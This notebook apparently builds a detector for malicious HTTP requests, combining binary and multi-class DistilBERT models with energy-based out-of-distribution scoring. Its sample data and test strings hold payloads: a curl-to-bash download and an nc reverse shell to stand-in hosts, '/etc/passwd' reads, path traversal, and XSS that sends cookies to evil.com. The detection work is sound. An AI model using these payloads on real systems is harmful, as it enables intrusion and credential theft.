In [18]:
import torch
import numpy as np
import pandas as pd
from tqdm import tqdm
from pprint import pprint
from datasets import Dataset, ClassLabel
from transformers import AutoTokenizer, AutoModelForSequenceClassification

In [19]:
# Load dataset
df = pd.read_csv("./Datasets/multi_samples_55k.csv", dtype=str)
# df = pd.read_csv("./Datasets/binary_samples_50k.csv", dtype=str)
df = df.fillna('""')
df.head()

,is_attack,label,method,url,host,user_agent,accept,accept_language,accept_encoding,content_type,content_length,connection,cookie,body,x_forwarded_for,referer,origin,x_requested_with,http_version
0,1,path_traversal,PUT,/contact?path=..%5c..%5c..%5csystem32%5cconfig...,linkedinbackup.co,Mozilla/5.0 (compatible; AhrefsBot/7.0; +http:...,"text/html,application/xhtml+xml,application/xm...",tr;q=0.9,"gzip, deflate, br",application/json,"""""",keep-alive,ASP.NET_SessionId=; ls -la; trackingId=; curl ...,"{""values"": [""?path=..%5c..%5c..%5csystem32%5cc...","""""","""""","""""","""""",HTTP/1.1
1,0,benign,GET,/backup,www.mahindra.com,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...,"text/html,application/xhtml+xml,application/xm...",pt;q=0.9,"gzip, deflate, br","""""","""""",keep-alive,PHPSESSID=random_session_id; lang=es,"""""","""""","""""","""""","""""",HTTP/1.1
2,0,benign,DELETE,/search,www.chase.com,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:1...,"text/html,application/xhtml+xml,application/xm...",fr;q=0.9,"gzip, deflate, br","""""","""""",keep-alive,ASP.NET_SessionId=random_session_id; _ga=GA_an...,"""""","""""",https://www.chase.com/products,"""""","""""",HTTP/1.1
3,1,ssrf,DELETE,/api/cart?proxy=http://127.0.0.1%2523@public.com,memberbank.org,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7...,"text/html,application/xhtml+xml,application/xm...",no;q=0.9,"gzip, deflate, br","""""","""""",keep-alive,sessionid=& whoami; trackingId=|cat /etc/passw...,"""""","""""","""""","""""","""""",HTTP/1.1
4,0,benign,POST,/.env,www.blinkit.com,masscan/1.0 (https://github.com/robertdavidgra...,"text/html,application/xhtml+xml,application/xm...",fi;q=0.9,"gzip, deflate, br",application/x-www-form-urlencoded,"""""",keep-alive,express:sess=random_session_id; _ga=GA_analyti...,Generic content type 7590,"""""","""""","""""","""""",HTTP/1.1


In [20]:
# Combine features into a single text field
df["value"] = df.apply(
    lambda row: f"""[METHOD] {row['method']} [URL] {row['url']} [COOKIE] {row['cookie']} [BODY] {row['body']} [HOST] {row['host']} [USER_AGENT] {row['user_agent']} [X_FORWARDED_FOR] {row['x_forwarded_for']} [REFERER] {row['referer']} [X_REQUESTED_WITH] {row['x_requested_with']} [ACCEPT_LANG] {row['accept_language']} [HTTP_VERSION] {row['http_version']}""",
    axis=1
)
pprint(df["value"][0])

('[METHOD] PUT [URL] /contact?path=..%5c..%5c..%5csystem32%5cconfig%5csystem '
 '[COOKIE] ASP.NET_SessionId=; ls -la; trackingId=; curl '
 'http://evil.com/script.sh | bash; lang=| nc -e /bin/bash attacker.com 4444 '
 '[BODY] {"values": ["?path=..%5c..%5c..%5csystem32%5cconfig%5csystem", '
 '"test", "sample"]} [HOST] linkedinbackup.co [USER_AGENT] Mozilla/5.0 '
 '(compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/) [X_FORWARDED_FOR] "" '
 '[REFERER] "" [X_REQUESTED_WITH] "" [ACCEPT_LANG] tr;q=0.9 [HTTP_VERSION] '
 'HTTP/1.1')


In [21]:
dataset = Dataset.from_pandas(df[["value", "label"]])
dataset

Dataset({
    features: ['value', 'label'],
    num_rows: 55000
})

In [22]:
unique_labels = sorted(df['label'].unique()) # need to add one more Suspicious Activity Detected
label_count = df['label'].value_counts()
dataset = dataset.cast_column("label", ClassLabel(names=unique_labels, num_classes=len(label_count)))
dataset.features

Casting the dataset: 100%|██████████| 55000/55000 [00:00<00:00, 561272.00 examples/s]


{'value': Value(dtype='string', id=None),
 'label': ClassLabel(names=['benign', 'deserialization', 'graphql_attacks', 'jwt_attacks', 'lfi', 'modern_cmdi', 'modern_file_attacks', 'modern_sqli', 'modern_ssrf', 'modern_xss', 'nosql_injection', 'open_redirect', 'path_traversal', 'prototype_pollution', 'sqli', 'ssrf', 'template_injection', 'xss', 'xxe_injection'], id=None)}

In [23]:
train_test = dataset.train_test_split(test_size=0.3, stratify_by_column="label", seed=42)
val_test = train_test["test"].train_test_split(test_size=0.5, stratify_by_column="label", seed=42)

In [24]:
dataset_dict = {
    "train": train_test["train"],
    "val": val_test["train"],
    "test": val_test["test"]
}

Now load my trained binary model, show as follows:


In [25]:
binary_model_dir = "./Models/absolution"
binary_model = AutoModelForSequenceClassification.from_pretrained(
    binary_model_dir,
    use_safetensors=True  # Explicitly load from .safetensors (optional, auto-detected)
)
binary_model_tokenizer = AutoTokenizer.from_pretrained(binary_model_dir)

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
binary_model = binary_model.to(device)
binary_model.eval() # Set to evaluation mode

DistilBertForSequenceClassification(
  (distilbert): DistilBertModel(
    (embeddings): Embeddings(
      (word_embeddings): Embedding(30522, 768, padding_idx=0)
      (position_embeddings): Embedding(512, 768)
      (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
      (dropout): Dropout(p=0.1, inplace=False)
    )
    (transformer): Transformer(
      (layer): ModuleList(
        (0-5): 6 x TransformerBlock(
          (attention): DistilBertSdpaAttention(
            (dropout): Dropout(p=0.1, inplace=False)
            (q_lin): Linear(in_features=768, out_features=768, bias=True)
            (k_lin): Linear(in_features=768, out_features=768, bias=True)
            (v_lin): Linear(in_features=768, out_features=768, bias=True)
            (out_lin): Linear(in_features=768, out_features=768, bias=True)
          )
          (sa_layer_norm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
          (ffn): FFN(
            (dropout): Dropout(p=0.1, inplace=False)


In [26]:
def tokenize_fun(examples):
    return binary_model_tokenizer(
        examples["value"],
        padding="max_length",
        truncation=True,
        max_length=512,
        return_tensors="pt"
    )

tokenized_datasets = {
    "train": dataset_dict["train"].map(tokenize_fun, batched=True),
    "val": dataset_dict["val"].map(tokenize_fun, batched=True),
    "test": dataset_dict["test"].map(tokenize_fun, batched=True)
}

Map:   0%|          | 0/38500 [00:00<?, ? examples/s]

Map: 100%|██████████| 8250/8250 [00:02<00:00, 3174.77 examples/s]


In [27]:
tokenized_datasets['val'].features

{'value': Value(dtype='string', id=None),
 'label': ClassLabel(names=['benign', 'deserialization', 'graphql_attacks', 'jwt_attacks', 'lfi', 'modern_cmdi', 'modern_file_attacks', 'modern_sqli', 'modern_ssrf', 'modern_xss', 'nosql_injection', 'open_redirect', 'path_traversal', 'prototype_pollution', 'sqli', 'ssrf', 'template_injection', 'xss', 'xxe_injection'], id=None),
 'input_ids': Sequence(feature=Value(dtype='int32', id=None), length=-1, id=None),
 'attention_mask': Sequence(feature=Value(dtype='int8', id=None), length=-1, id=None)}

INIT MULTI MODEL


In [28]:
train_labels = dataset_dict["train"]["label"]
class_counts = np.bincount(train_labels)
class_weights = torch.tensor([1.0 / count for count in class_counts], dtype=torch.float32)

In [29]:
# Load the trained multi-class model and move to device
model_multi = AutoModelForSequenceClassification.from_pretrained("./Models/multibsolution").to(device)
model_multi.eval()

DistilBertForSequenceClassification(
  (distilbert): DistilBertModel(
    (embeddings): Embeddings(
      (word_embeddings): Embedding(30522, 768, padding_idx=0)
      (position_embeddings): Embedding(512, 768)
      (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
      (dropout): Dropout(p=0.1, inplace=False)
    )
    (transformer): Transformer(
      (layer): ModuleList(
        (0-5): 6 x TransformerBlock(
          (attention): DistilBertSdpaAttention(
            (dropout): Dropout(p=0.1, inplace=False)
            (q_lin): Linear(in_features=768, out_features=768, bias=True)
            (k_lin): Linear(in_features=768, out_features=768, bias=True)
            (v_lin): Linear(in_features=768, out_features=768, bias=True)
            (out_lin): Linear(in_features=768, out_features=768, bias=True)
          )
          (sa_layer_norm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
          (ffn): FFN(
            (dropout): Dropout(p=0.1, inplace=False)


In [30]:
def energy_score(logits, T=1):
    return -T * torch.logsumexp(logits / T, dim=1)

# Compute energy scores
val_energies = []
val_labels = []

with torch.no_grad():
    for example in tqdm(tokenized_datasets["val"]):
        inputs = {
            "input_ids": torch.tensor([example["input_ids"]]).to(device),
            "attention_mask": torch.tensor([example["attention_mask"]]).to(device)
        }
        outputs = model_multi(**inputs)
        energy = energy_score(outputs.logits).item()
        val_energies.append(energy)
        val_labels.append(example["label"])

100%|██████████| 8250/8250 [03:40<00:00, 37.49it/s]


In [31]:
threshold = np.percentile(val_energies, 95)  # 95% of known attacks have energy < this value
print(f"Optimal energy threshold: {threshold}")

Optimal energy threshold: -10.053601026535034


In [32]:
def detect_attack(text, binary_model, multi_model, tokenizer, energy_threshold=-5, device="cuda"):
    # Move models to device
    binary_model = binary_model.to(device)
    multi_model = multi_model.to(device)
    
    # Tokenize input
    inputs = tokenizer(text, return_tensors="pt", truncation=True, max_length=512).to(device)
    
    # Get predictions from both models
    with torch.no_grad():
        binary_out = binary_model(**inputs)
        multi_out = multi_model(**inputs)
    
    # Process binary model output
    binary_probs = torch.softmax(binary_out.logits, dim=-1)
    binary_pred = torch.argmax(binary_probs).item()  # 0=benign, 1=malicious
    
    # Process multi-class model output
    multi_probs = torch.softmax(multi_out.logits, dim=-1)
    multi_pred_idx = torch.argmax(multi_probs).item()
    multi_pred_label = multi_model.config.id2label[multi_pred_idx]
    
    # Calculate energy score
    energy = energy_score(multi_out.logits).item()
    
    # Decision logic
    final_label = "benign"
    confidence = 1.0
    
    # Case 1: Both models agree on malicious (1 & 1)
    if binary_pred == 1 and multi_pred_label != "benign":
        final_label = multi_pred_label if energy <= energy_threshold else "unknown_malware"
        confidence = multi_probs[0][multi_pred_idx].item()
    
    # Case 2: Binary says malicious, multi says benign (1 & 0)
    elif binary_pred == 1 and multi_pred_label == "benign":
        final_label = "unknown_malware" if energy > energy_threshold else "benign"
        confidence = binary_probs[0][1].item()  # Binary's malicious confidence
    
    # Case 3: Binary says benign, multi says malicious (0 & 1)
    elif binary_pred == 0 and multi_pred_label != "benign":
        final_label = multi_pred_label  # Trust multi-class prediction
        confidence = multi_probs[0][multi_pred_idx].item()
    
    # Case 4: Both say benign but check OOD (0 & 0)
    else:
        if energy > energy_threshold:
            final_label = "unknown_malware"
            confidence = energy  # Use energy as confidence measure
        else:
            final_label = "benign"
            confidence = binary_probs[0][0].item() * multi_probs[0][0].item()  # Combined confidence
    
    return {
        "final_label": final_label,
        "confidence": confidence,
        "binary_score": binary_probs.cpu().detach().numpy()[0],
        "multi_scores": multi_probs.cpu().detach().numpy()[0],
        "energy_score": energy
    }

In [33]:
# sample_request = "[METHOD] GET [URL] /ping?ip=127.0.0.1;cat+/etc/passwd [COOKIE] PHPSESSID=nqc199c0v4bsri69skm0216m9d; _ga=GA1.2.1863267974.1695287985 [BODY]  [HOST] storageoffer.edu [PROTOCOL] HTTP/1.1 [USER_AGENT] Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36 [ACCEPT] text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 [ACCEPT_ENCODING] gzip, deflate, br [ACCEPT_LANGUAGE] en-IN,en;q=0.5 [CONTENT_TYPE]  [CONTENT_LENGTH]  [CONNECTION] keep-alive [X_FORWARDED_FOR] 183.49.114.224 [REFERER]"
# sample_request = "[METHOD] GET [URL] /ping?ip=127.0.0.1%3Bcat%20%2Fetc%2Fpasswd [COOKIE] PHPSESSID=nqc199c0v4bsri69skm0216m9d; _ga=GA1.2.1863267974.1695287985 [BODY]  [HOST] storageoffer.edu [PROTOCOL] HTTP/1.1 [USER_AGENT] Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36 [ACCEPT] text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 [ACCEPT_ENCODING] gzip, deflate, br [ACCEPT_LANGUAGE] en-IN,en;q=0.5 [CONTENT_TYPE]  [CONTENT_LENGTH]  [CONNECTION] keep-alive [X_FORWARDED_FOR] 183.49.114.224 [REFERER]"
# sample_request = "[METHOD] PATCH [URL] /dashboard [COOKIE] PHPSESSID=j9h8odcf4ggeixsmpu16zl6mz2; tracking_id=UA441811 [BODY]  [HOST] userblog.info [PROTOCOL] HTTP/1.1 [USER_AGENT] Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 [ACCEPT] text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 [ACCEPT_ENCODING] gzip, deflate, br [ACCEPT_LANGUAGE] en-US,en;q=0.5 [CONTENT_TYPE]  [CONTENT_LENGTH]  [CONNECTION] keep-alive [X_FORWARDED_FOR] 148.30.115.218 [REFERER] https://legitimate-site.com/"
sample_request = "[METHOD] POST [URL] /dashboard [COOKIE] PHPSESSID=zkvw6vx5yl005qsa0767qucbi9; tracking_id=UA970776; _ga=GA1.2.1275907055.1612569275; auth_bypass=true [BODY]  [HOST] spotifymember.me [PROTOCOL] HTTP/1.1 [USER_AGENT] Mozilla/5.0 (iPhone; CPU iPhone OS 16_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1 [ACCEPT] text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 [ACCEPT_ENCODING] gzip, deflate, br [ACCEPT_LANGUAGE] en-US,en;q=0.5 [CONTENT_TYPE] application/x-yaml [CONTENT_LENGTH] 0 [CONNECTION] keep-alive [X_FORWARDED_FOR] 154.181.93.29 [REFERER] https://google.com/"
# sample_request = "[METHOD] GET [URL] /dashboard [COOKIE] PHPSESSID=kq51iwb3yadkkuveoq9wb107d6; tracking_id=UA981031 [BODY]  [HOST] netflixinvest.edu [PROTOCOL] HTTP/1.1 [USER_AGENT] Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 [ACCEPT] text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 [ACCEPT_ENCODING] gzip, deflate, br [ACCEPT_LANGUAGE] en-US,en;q=0.5 [CONTENT_TYPE]  [CONTENT_LENGTH]  [CONNECTION] close [X_FORWARDED_FOR]  [REFERER]"
sample_request = "[METHOD] PUT [URL] /shell.php?search=<style>@keyframes [COOKIE] _rails_session=<script>WebSocket('ws://evil.com').send(document.cookie)</script>; _ga=<script>new Image().src='http://evil.com/?c='+document.cookie;</script> [BODY] data=?search=<style>@keyframes x{}</style><iframe style='animation-name:x' onanimationend='alert(1)'>&timestamp=1746479555 [HOST] appletwitter.biz [PROTOCOL]  [USER_AGENT] Mozilla/5.0 (Linux; Android 14; OnePlus 11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36 [ACCEPT] text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 [ACCEPT_ENCODING] gzip, deflate, br [ACCEPT_LANGUAGE] es;q=0.9 [CONTENT_TYPE] multipart/form-data [CONTENT_LENGTH]  [CONNECTION] close [X_FORWARDED_FOR]  [REFERER] "


In [34]:
energy_threshold = -4

result = detect_attack(
    text=sample_request,
    binary_model=binary_model,
    multi_model=model_multi,
    tokenizer=binary_model_tokenizer,
    energy_threshold=energy_threshold,  # Tuned threshold from validation
    device="cuda" if torch.cuda.is_available() else "cpu"
)

# Formatted output with proper dictionary access
print(f"""
Final Classification: {result['final_label']}
Confidence: {result['confidence']:.2%}
Energy Score: {result['energy_score']:.2f}
Binary Probabilities: [Benign: {result['binary_score'][0]:.4f}, Malicious: {result['binary_score'][1]:.4f}]
Multi-Class Probabilities:""")

# Print multi-class probabilities with labels
for label, prob in zip(model_multi.config.id2label.values(), result['multi_scores']):
    print(f"  {label}: {prob:.4f}")

# Add OOD threshold reference
print(f"\nOOD Threshold: {energy_threshold} (Values above this indicate potential unknown attacks)")


Final Classification: xss
Confidence: 100.00%
Energy Score: -11.70
Binary Probabilities: [Benign: 0.0000, Malicious: 1.0000]
Multi-Class Probabilities:
  benign: 0.0000
  deserialization: 0.0000
  graphql_attacks: 0.0000
  jwt_attacks: 0.0000
  lfi: 0.0000
  modern_cmdi: 0.0000
  modern_file_attacks: 0.0000
  modern_sqli: 0.0000
  modern_ssrf: 0.0000
  modern_xss: 0.0000
  nosql_injection: 0.0000
  open_redirect: 0.0000
  path_traversal: 0.0000
  prototype_pollution: 0.0000
  sqli: 0.0000
  ssrf: 0.0000
  template_injection: 0.0000
  xss: 1.0000
  xxe_injection: 0.0000

OOD Threshold: -4 (Values above this indicate potential unknown attacks)


In [35]:
# def detect_attack(text, binary_model, multi_model, tokenizer, energy_threshold=-5):
#     # Step 1: Binary classification
#     binary_inputs = tokenizer(text, return_tensors="pt", truncation=True, max_length=512).to(device)
#     binary_outputs = binary_model(**binary_inputs)
#     binary_probs = torch.nn.functional.softmax(binary_outputs.logits, dim=-1)
    
#     if torch.argmax(binary_probs).item() == 0:  # Benign
#         return "benign", binary_probs
    
#     # Step 2: Multi-class classification
#     multi_inputs = tokenizer(text, return_tensors="pt", truncation=True, max_length=512).to(device)
#     multi_outputs = multi_model(**multi_inputs)
#     multi_probs = torch.nn.functional.softmax(multi_outputs.logits, dim=-1)
    
#     # Step 3: OOD detection
#     energy = energy_score(multi_outputs.logits).item()
#     if energy > energy_threshold:
#         return "unknown_malware", multi_probs.cpu().detach().numpy()
#     else:
#         pred_class = torch.argmax(multi_probs).item()
#         return model_multi.config.id2label[pred_class], multi_probs.cpu().detach().numpy()

In [36]:
# def detect_attack(text, binary_model, multi_model, tokenizer, energy_threshold=-5, device="cuda"):
#     # Ensure models are on the correct device
#     binary_model = binary_model.to(device)
#     multi_model = multi_model.to(device)
    
#     inputs = tokenizer(text, return_tensors="pt", truncation=True, max_length=512).to(device)
    
#     # Step 1: Binary classification
#     with torch.no_grad():
#         binary_outputs = binary_model(**inputs)
#     binary_probs = torch.nn.functional.softmax(binary_outputs.logits, dim=-1)
    
#     if torch.argmax(binary_probs).item() == 0:  # Benign
#         return "benign", binary_probs.cpu().detach().numpy()[0]
    
#     # Step 2: Multi-class classification
#     with torch.no_grad():
#         multi_outputs = multi_model(**inputs)
#     multi_probs = torch.nn.functional.softmax(multi_outputs.logits, dim=-1)
    
#     # Step 3: OOD detection
#     energy = energy_score(multi_outputs.logits).item()
#     if energy > energy_threshold:
#         # Create probability vector
#         unknown_probs = np.zeros(len(multi_model.config.id2label) + 1)
#         unknown_probs[-1] = 1.0
#         return "unknown_malware", unknown_probs
#     else:
#         pred_class = torch.argmax(multi_probs).item()
#         return multi_model.config.id2label[pred_class], multi_probs.cpu().detach().numpy()[0]


In [37]:
# # Detect attack
# label, probs = detect_attack(
#     sample_request,
#     binary_model,
#     model_multi,
#     binary_model_tokenizer,
#     energy_threshold=-3  # Tune this threshold on validation data
# )

# print(f"Prediction: {label}")
# print(f"Probabilities: {probs}")

In [38]:
# if max_prob > 0.95:
#     take_action()
# else:
#     manual_review()

Threshold Guidance:

    Strict Security (Low FPR): energy_threshold = -3

    Balanced (Default): energy_threshold = -5

    High Sensitivity (Low FN): energy_threshold = -7


In [39]:
result = detect_attack(
    text=sample_request,
    binary_model=binary_model,
    multi_model=model_multi,
    tokenizer=binary_model_tokenizer,
    energy_threshold=-4  # Tuned from validation data
)

print(f"""
Final Classification: {result['final_label']}
Confidence: {result['confidence']:.2%}
Energy Score: {result['energy_score']:.2f}
Binary Probabilities: {result['binary_score']}
Multi-Class Probabilities: {result['multi_scores']}
""")


Final Classification: xss
Confidence: 100.00%
Energy Score: -11.70
Binary Probabilities: [1.0741617e-06 9.9999893e-01]
Multi-Class Probabilities: [1.17462349e-07 1.33711247e-08 5.04518951e-08 1.11756222e-07
 4.50299410e-07 1.14115714e-07 1.49071894e-07 4.65060417e-08
 6.28105639e-08 5.61449781e-07 2.20193840e-07 1.11088957e-06
 3.85950557e-07 3.40999293e-07 1.82327867e-07 1.95084269e-07
 2.85683910e-07 9.99994874e-01 7.23254402e-07]



To generate Energies we are loading a labeled dataset which should be maintained
by the enterprised at the backend and continiously keep updating it
with new values to have many differenet energies to predict
